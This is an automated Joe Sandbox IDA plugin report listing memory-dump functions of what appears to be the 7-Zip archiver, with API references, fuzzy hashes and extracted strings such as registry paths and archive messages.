                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID: act:$ cpus:$ gran:$ page:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-454015223
                                                                                                                                                                                                                                                  • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                                                                  • Instruction ID: 668eb6845594641ab221064142d8550520610f6a0865972b844bc87078b19437
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3551C56635060192DE28FB16E9613A92325EBC97D0F84D136EA0F4BB9AEF7CC555C340
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009801D7
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 009802EA
                                                                                                                                                                                                                                                    • Part of subcall function 0097FD30: _CxxThrowException.MSVCRT ref: 0097FE50
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 0098031F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • There is no second file name for rename pair:, xrefs: 00980302
                                                                                                                                                                                                                                                  • Empty file path, xrefs: 009802CD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                                  • String ID: Empty file path$There is no second file name for rename pair:
                                                                                                                                                                                                                                                  • API String ID: 3129652135-1725603831
                                                                                                                                                                                                                                                  • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                                  • Instruction ID: e3895d8cd045b2fc13724e80886bf7ff7dbba3ae22780bc4f88f4734ba7c1262
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46418F62208684C5CA30EB19E84479E6B60F3D57B4F908712EEB9077E9DB79C599CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastSecurity
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 555121230-0
                                                                                                                                                                                                                                                  • Opcode ID: 4264c5047130bf6628e170ce92b62f2488e22dc27d517a212768e73cfea52f87
                                                                                                                                                                                                                                                  • Instruction ID: 2214b410b3621b73b49a612a499ec27093551c6aa743e68fed78f93a15686223
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4264c5047130bf6628e170ce92b62f2488e22dc27d517a212768e73cfea52f87
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB416333304A949ACB60DF2AE84476973AAF384B94F594135DF6A47724EF34C886C751
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                  • API String ID: 1294909896-1885708031
                                                                                                                                                                                                                                                  • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                                                                  • Instruction ID: e659fcedc7cfe85dbf5b61db94e387da3f9026ac493133534cfc7c0b0ecc944a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7231B423218A9481CB20DF15D94065EA764F7D57E4F544A25FF9F4B764CE39C882C740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00973E32), ref: 00973D18
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00973E32), ref: 00973D25
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 00973D4E
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00973E32), ref: 00973DC1
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 00973DFA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2296236218-0
                                                                                                                                                                                                                                                  • Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                                                                  • Instruction ID: c09e5690c5cc24191cb71a812c1b5bf412be3873698cc086d76f57b97eab8236
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB31D273704BC59ADB30CF25E48435EBBA9F785B94F54C121DA8963B24DB38C981D741
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                                                                  • Instruction ID: 23449de5cfb9b61fd196aadcbcc488f14f27e090cb6a8055402a6714e244621e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78213D67716A4085CB25AF76D550369A324FBC5FA8F698322DF2D1B798CF35C801C320
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Create$CloseHandleTimefree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 234454789-0
                                                                                                                                                                                                                                                  • Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                                                                  • Instruction ID: a226383c6b5077682a5e4a8177b599b1236969881151006f5689fa9a3b301d4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3721873320454086D6209F1AFD5475A7725F385BF8F548321EE7947BD4CB39C98AD741
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1475443563-0
                                                                                                                                                                                                                                                  • Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                                                                  • Instruction ID: 56017f73c386039106b09c144631d6e6e2dbe9e2ec328b9b8a9f093cc4b00f6d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B117CE130974191EF049F2E9E523E92369DB49FD4F945825DE0A8B207EF78CE46D305
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0097B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,009982CA), ref: 0097B56F
                                                                                                                                                                                                                                                    • Part of subcall function 0097B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0097B4AA
                                                                                                                                                                                                                                                    • Part of subcall function 0097B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0097B4F8
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00998343
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: free.MSVCRT ref: 00973431
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C
                                                                                                                                                                                                                                                    • Part of subcall function 00978624: free.MSVCRT ref: 009786A9
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099832B
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00998336
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$QueryValue$Openmemmove
                                                                                                                                                                                                                                                  • String ID: 7z.dll$Software\7-zip
                                                                                                                                                                                                                                                  • API String ID: 2771487249-1558686312
                                                                                                                                                                                                                                                  • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                                                                  • Instruction ID: 4a40bc855a3f9d5524c0b5c8139c802b9a39c989e53147e642707ef057425e92
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6118A5334898050CE20EB22D9513EF6724EBD6BE4FC49211BD5D477A6DF28C64AC700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3873070119-0
                                                                                                                                                                                                                                                  • Opcode ID: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
                                                                                                                                                                                                                                                  • Instruction ID: 0a20b5ed244b33e74f1243c52c69b686a893f01e0ad7aedcae6869a1e3a33d3e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04112B6322494592DB20DB2AE95476E7330F7D9BE4F408221EFAE87AA5DF28C945C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateDirectoryfree$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3252411863-0
                                                                                                                                                                                                                                                  • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                                                                  • Instruction ID: 950d72d8d00507fa7dbb6fae84423fb1a08e20a5d6a3de18a6158125b8b3fc5a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95016723318A4081DA34DB66EE9433D6365EBC67F4F58C220DA6D877E5DF18C94AD710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                                                                  • Instruction ID: 04840431bd6401d874bbc2f70d5be2f132e976cb07bebd45245dd473f160be93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F0DA6366A50442CA15FF37E46172E5311B7C7F91F81A862AF0E57711DE38C487C714
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                                                                  • Instruction ID: f224bc2d97b907d1c124282abd12579a9c9b46fbbbcdb5300bc9996069bbd51f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BE0F56363840481CB14FF77DCA212C2324FBD5F8875494519F2E8B325CD24C852C3A4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B25EC
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B2636
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$freememset
                                                                                                                                                                                                                                                  • String ID: Name$Size
                                                                                                                                                                                                                                                  • API String ID: 2276422817-481755742
                                                                                                                                                                                                                                                  • Opcode ID: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
                                                                                                                                                                                                                                                  • Instruction ID: 8500741ab9e4211f05c70e431603777d4cc80ab7ab77165af1ba3f621912c2d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4841B573224684E2DB26DF34E5547DE2724F784B68F849122EB5E46291DFB8C946C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBDCD
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBE0B
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$memset
                                                                                                                                                                                                                                                  • String ID: : Removing files after including to archive$Removing
                                                                                                                                                                                                                                                  • API String ID: 3543874852-1218467041
                                                                                                                                                                                                                                                  • Opcode ID: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
                                                                                                                                                                                                                                                  • Instruction ID: 4cce57a07ce8a29a0ce53edb31b082cb39c5a514ffbf1fa581fc10a43c9f66d6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4318363600A8592DE79DB35E9953EE6364E780794F48D422CB9F462A1DFBCD4CAC300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BC4FD
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BC50D
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009BC553
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
